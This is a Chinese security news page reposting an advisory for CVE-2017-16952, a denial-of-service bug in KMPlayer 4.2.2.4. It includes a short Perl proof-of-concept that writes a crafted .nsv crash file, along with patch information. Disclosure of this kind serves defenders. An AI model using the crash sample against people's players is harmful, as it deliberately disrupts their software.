手机版
你好,游客 登录 注册 搜索
背景:
阅读新闻

KMPlayer .nsv远程拒绝服务漏洞(CVE-2017-16952)

[日期:2018-01-25] 来源:Linux社区  作者:Linux [字体: ]
KMPlayer .nsv远程拒绝服务漏洞(CVE-2017-16952)


发布日期:2017-11-28
更新日期:2018-01-25

受影响系统:

KMPlayer KMPlayer 4.2.2.4

描述:


BUGTRAQ  ID: 102717
CVE(CAN) ID: CVE-2017-16952

KMPlayer是影音全能播放器,是从linux平台移植而来的。

KMPlayer 4.2.2.4版本处理构造的.nsv文件时在实现上存在安全漏洞,远程攻击者利用此漏洞可造成拒绝服务。

<*来源:R.Yavari
  *>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

R.Yavari ()提供了如下测试方法:

#! /usr/bin/perl
# Exploit Title: KMPlayer .nsv Denial of Service
# Date: 2017-11-22
# Exploit Author: R.Yavari
# Version: v4.2.2.4
# Tested on: Windows 10 , Windows 7
# other version should be affected
# NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet,
# such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data.
# CVE-2017-16952
# http://cdn.kmplayer.com/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe
# (D.P)

open(code, ">kmplayer.nsv") || die "can't create crash sample.$!";
binmode(code);
$data =
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45";
print code $data;
 
close(code);

建议:


厂商补丁:

KMPlayer
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:


https://www.exploit-db.com/exploits/43185/

本文永久更新链接地址http://www.chineselinuxuniversity.net/Linux/2018-01/150555.htm

linux
相关资讯       KMPlayer安全漏洞 
本文评论   查看全部评论 (0)
表情: 表情 姓名: 字数

       

评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款